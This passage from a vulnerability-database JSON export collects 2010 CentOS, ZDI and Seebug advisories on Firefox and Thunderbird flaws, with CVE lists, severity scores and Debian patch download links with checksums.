9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0171", "CVE-2010-0169"], "modified": "2010-02-18T16:56:41", "href": "http://lists.centos.org/pipermail/centos-announce/2010-February/016505.html", "id": "CESA-2010:0113", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:42", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0153.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5.centos", "arch": "x86_64", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-2.el5.centos", "arch": "i386", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.24-2.el5.centos.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0153\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-2462, CVE-2009-2463, CVE-2009-2466,\nCVE-2009-3072, CVE-2009-3075, CVE-2009-3380, CVE-2009-3979, CVE-2010-0159)\n\nA use-after-free flaw was found in Thunderbird. An attacker could use this\nflaw to crash Thunderbird or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2009-3077)\n\nA heap-based buffer overflow flaw was found in the Thunderbird string to\nfloating point conversion routines. An HTML mail message containing\nmalicious JavaScript could crash Thunderbird or, potentially, execute\narbitrary code with the privileges of the user running Thunderbird.\n(CVE-2009-0689)\n\nA use-after-free flaw was found in Thunderbird. Under low memory\nconditions, viewing an HTML mail message containing malicious content could\nresult in Thunderbird executing arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-1571)\n\nA flaw was found in the way Thunderbird created temporary file names for\ndownloaded files. If a local attacker knows the name of a file Thunderbird\nis going to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA flaw was found in the way Thunderbird displayed a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differed from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that is different from what the user expected.\n(CVE-2009-3376)\n\nA flaw was found in the way Thunderbird processed SOCKS5 proxy replies. A\nmalicious SOCKS5 server could send a specially-crafted reply that would\ncause Thunderbird to crash. (CVE-2009-2470)\n\nDescriptions in the dialogs when adding and removing PKCS #11 modules were\nnot informative. An attacker able to trick a user into installing a\nmalicious PKCS #11 module could use this flaw to install their own\nCertificate Authority certificates on a user's machine, making it possible\nto trick the user into believing they are viewing trusted content or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2009-3076)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/016584.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/016585.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n", "edition": 1, "reporter": "CentOS Project", "published": "2010-03-26T21:37:29", "title": "thunderbird security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2470", "CVE-2009-3076", "CVE-2009-3979", "CVE-2009-3376", "CVE-2009-1571", "CVE-2009-3274", "CVE-2010-0159", "CVE-2009-3380", "CVE-2009-3072", "CVE-2009-0689", "CVE-2009-2463", "CVE-2010-0171", "CVE-2009-3075", "CVE-2010-0163", "CVE-2009-3384", "CVE-2009-2466", "CVE-2009-3077", "CVE-2009-2462", "CVE-2010-0169"], "modified": "2010-03-26T21:37:29", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/016584.html", "id": "CESA-2010:0153", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:07", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0154.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4.centos", "arch": "x86_64", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-25.el4.centos", "arch": "i386", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-25.el4.centos.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0154\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-2462, CVE-2009-2463, CVE-2009-2466,\nCVE-2009-3072, CVE-2009-3075, CVE-2009-3380, CVE-2009-3979, CVE-2010-0159)\n\nA use-after-free flaw was found in Thunderbird. An attacker could use this\nflaw to crash Thunderbird or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2009-3077)\n\nA heap-based buffer overflow flaw was found in the Thunderbird string to\nfloating point conversion routines. An HTML mail message containing\nmalicious JavaScript could crash Thunderbird or, potentially, execute\narbitrary code with the privileges of the user running Thunderbird.\n(CVE-2009-0689)\n\nA use-after-free flaw was found in Thunderbird. Under low memory\nconditions, viewing an HTML mail message containing malicious content could\nresult in Thunderbird executing arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2009-1571)\n\nA flaw was found in the way Thunderbird created temporary file names for\ndownloaded files. If a local attacker knows the name of a file Thunderbird\nis going to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA flaw was found in the way Thunderbird displayed a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differed from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that is different from what the user expected.\n(CVE-2009-3376)\n\nA flaw was found in the way Thunderbird processed SOCKS5 proxy replies. A\nmalicious SOCKS5 server could send a specially-crafted reply that would\ncause Thunderbird to crash. (CVE-2009-2470)\n\nDescriptions in the dialogs when adding and removing PKCS #11 modules were\nnot informative. An attacker able to trick a user into installing a\nmalicious PKCS #11 module could use this flaw to install their own\nCertificate Authority certificates on a user's machine, making it possible\nto trick the user into believing they are viewing trusted content or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2009-3076)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/016576.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/016577.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0154.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-03-17T19:24:23", "title": "thunderbird security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2470", "CVE-2009-3076", "CVE-2009-3979", "CVE-2009-3376", "CVE-2009-1571", "CVE-2009-3274", "CVE-2010-0159", "CVE-2009-3380", "CVE-2009-3072", "CVE-2009-0689", "CVE-2009-2463", "CVE-2010-0171", "CVE-2009-3075", "CVE-2010-0163", "CVE-2009-3384", "CVE-2009-2466", "CVE-2009-3077", "CVE-2009-2462", "CVE-2010-0169"], "modified": "2010-03-17T19:24:43", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/016576.html", "id": "CESA-2010:0154", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:48", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-04.html"], "edition": 2, "description": "This vulnerability allows remote attackers to bypass specific script execution enforcements on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.\n\nThe specific flaw exists in the lack of cross domain policy enforcement. Through usage of the showModalDialog() JavaScript method an attacker can gather sensitive information from another website. This vulnerability can be exploited to obtain website credentials not originating from the attacking site.", "reporter": "Anonymous", "published": "2010-02-19T00:00:00", "title": "Mozilla Firefox showModalDialog Cross-Domain Scripting Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2009-3988"], "modified": "2010-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-10-019", "id": "ZDI-10-019", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-11-09T00:18:01", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-02.html"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.\n\nThe specific flaw exists within the implementation of web worker threads. Due to mishandling the array data type while processing posted messages, a web worker thread can be made to corrupt heap memory. An attacker can exploit this vulnerability to execute arbitrary code under the context of the user running the browser.", "reporter": "Orlando Barrera II, SecTheory", "published": "2010-04-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2010-0160"], "modified": "2010-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-10-046", "id": "ZDI-10-046", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:14:14", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID: CVE-2009-3988\r\n\r\nFirefox\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nFirefox\u7684\u540c\u6e90\u7b56\u7565\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u901a\u8fc7\u4f7f\u7528showModalDialog() JavaScript\u65b9\u6cd5\u7ed5\u8fc7\u6743\u9650\u9650\u5236\uff0c\u83b7\u53d6\u5176\u4ed6\u6d4f\u89c8\u7f51\u9762\u7684\u4fe1\u606f\u3002\r\n\r\n\u5229\u7528\u6b64\u6f0f\u6d1e\u9700\u8981\u4e00\u5b9a\u7684\u7528\u6237\u4ea4\u4e92\u53d1\u751f\u3002\n\nMozilla Firefox 3.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMozilla\r\n-------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "reporter": "Root", "published": "2010-02-20T00:00:00", "title": "Firefox showModalDialog()\u65b9\u6cd5\u8de8\u57df\u811a\u672c\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3988"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-02-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19160", "id": "SSV:19160", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T18:14:40", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 38286\r\nCVE ID: CVE-2010-0159\r\n\r\nFirefox\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nFirefox\u6d4f\u89c8\u5668\u5f15\u64ce\u7684layout/generic/nsBlockFrame.cpp\u6587\u4ef6\u4e2d\u7684nsBlockFrame::StealFrame \u51fd\u6570\u4e2d\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\u3002\u7528\u6237\u53d7\u9a97\u8bbf\u95ee\u4e86\u6076\u610f\u7f51\u9875\u5c31\u53ef\u80fd\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6d4f\u89c8\u5668\u5d29\u6e83\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nMozilla Firefox 3.5.x\r\nMozilla Firefox 3.0.x\r\nMozilla Thunderbird 3.0\r\nMozilla SeaMonkey 2.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528JavaScript\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1999-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1999-1\uff1aNew xulrunner packages fix several vulnerabilities\r\n\u94fe\u63a5\uff1ahttp://www.debian.org/security/2010/dsa-1999\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.18-1.diff.gz\r\nSize/MD5 checksum: 116111 961d458012f83e32e0c3eb153359cc23\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.18.orig.tar.gz\r\nSize/MD5 checksum: 44161859 eeb10647fe0fe9a6b20cb725732b79a9\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.18-1.dsc\r\nSize/MD5 checksum: 1755 cbbc2a673c56439890e4c75c0062e06a\r\n\r\nArchitecture independent packages:\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.18-1_all.deb\r\nSize/MD5 checksum: 1465392 7874b2aefed84b79736a44ef0589b3e2\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 3666096 3382b0eae2d985ae9bbcf16014806825\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 432294 c2ec2c14cabb28156734e9e6c96c84c5\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 112122 7d0db4c185015b0ec7caeb1e9843216c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 163800 e31c406c36c7ea503f772dbebc7039ba\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 938384 af22c500dae1c84c661b0afa62b5fc2c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 72604 4a6d162a104fd021e52e61bffe28d70e\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 223528 ebfeb23f90f207524d2b14c1ab25b742\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 51113942 62902bb1c3c8349090b9055d6efa1482\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_alpha.deb\r\nSize/MD5 checksum: 9501180 538eb45320247045794a15c4bd1071ac\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 50351080 62a347648f988e78ca90d1d65be9ed13\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 101614 206328a373e5d2992ccb19ed064c8295\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 70008 41913d4df58730fe256a0bd480308d8e\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 223086 7eeb2da5ef7f96811b88e6cc97181a99\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 374298 b864e663810235886e5880c494043a01\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 890318 6fe29f796873ccdcfef29a98ca623b9c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 7730124 0ccda6e5dbfac8f7d943b809ea6cb3dd\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 152064 f7f7bc816f78aed6b1afa7a9b42469b4\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_amd64.deb\r\nSize/MD5 checksum: 3290046 806026ede74d749bc3a900ff56371f18\r\n\r\narm architecture (ARM)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 350644 37e691c10c63e6b489e6540cdef420e2\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 49307652 46a58ff355717da9e5ff845bcf9981b5\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 68334 da39688fccc9ee6e5a166af30995fbde\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 222152 8c0347c37daff67429faba68b94d12a3\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 83992 85a600ebcf53662d7b43f1b06e3bf86a\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 3583634 561e9b19477c0dc7a397fd068bf69230\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 815240 8815149ae297fc80b6a6583a87129f71\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 6797362 cb6388fb24c282d11557598dc5fdf67c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_arm.deb\r\nSize/MD5 checksum: 140764 11c84fe62069de449a85b88a747ab55b\r\n\r\narmel architecture (ARM EABI)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 223466 9ca0da7a2de7faa57d73138f20eb1951\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 6957582 15ac2699febcd1aa80eb5777b107f9a1\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 50145544 ea9e32f6fdbbb13c6c13ceabd754fe46\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 3581130 b848057bc9531db0d45f3e546b9008d2\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 352992 88696f63901aad373381a57648ae5b97\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 141322 ffb5f9bd526ae8332796af053ffa443f\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 84358 83aa9d77331cacc83d499f051045e5f2\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 822052 b1b624be2de8d879031968da29db1204\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_armel.deb\r\nSize/MD5 checksum: 69828 bf44c1a8dd3032732a5f095531bb60bc\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 158562 0fc6d96735f5cf70d0c6919a8957b626\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 9515012 6ed8f49f167bb6ed571d69bb6b4e7e80\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 413118 1c44a3840c9d819df841c1364065ae51\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 899168 791aecc32ffad7c9c8a8e262d89e2f4c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 51229704 feeafa3d9f4c2a019eb6d7d6ed86e384\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 223408 760eebdfd9d75de15598b6942c24ed58\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 72076 4c1af3bdcc34ed60fa67046f8c0f27b6\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 106790 34128b587f9bc4440273f2a9c50c60dd\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_hppa.deb\r\nSize/MD5 checksum: 3631216 879fb7d48fac57fb7cbc7b745aefc80a\r\n\r\ni386 architecture (Intel ia32)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 6602846 f4a442cd4340401eaf15b3789c6440a3\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 221986 f5952c4ff53f23dcbb5e83d4a1dc735a\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 68144 aa5b5b1f2bd1dd4dca1d6f23a1e77475\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 82650 c92d7cdd88482af8d17372fb206a7771\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 49521182 ab05f06480be3fccd20cdf24f3316170\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 350912 5d04bea3ead683aa294c3c6a69ca51df\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 3569664 9b88aef38d9c9afa92404e5a1aa1858a\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 852056 fc6194c645bad45268962040cf2f741f\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_i386.deb\r\nSize/MD5 checksum: 140810 8bf780e4cd352063c1db860ba2ce6442\r\n\r\nia64 architecture (Intel ia64)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 3399426 8368a170abe08b475502ffaa8f6ef01a\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 542202 f339fded4d5e1e72ce22a021a2e855c9\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 76590 31997304eef7aee61ff7cce784b64ee5\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 223218 27abf1d33790a29eeeed3ea4b4964a85\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 121604 ebce1c45860953d72149ea62df1c3614\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 811250 c05f1961aa895766395478b83ff2cc3c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 11311038 012ce2b6d478aff1425ac67d7ab363f1\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 49702958 70229b141f044a4e9f9b59bd6bd76769\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_ia64.deb\r\nSize/MD5 checksum: 180270 33ec97ddc77999747ca8255fe6ca5b1e\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 51875290 249aa2adc5bc08d12d15c5ff31bb9677\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 223132 c8aaf2d7fae0c056e36e1400d89626a6\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 70216 11ff7e521c0a01fe591ccea2f854c983\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 3616440 6f9099c4e119ad9417e723d8686d5047\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 380320 3b48ef0b7b6fb5099c8289a1d034d66c\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 97184 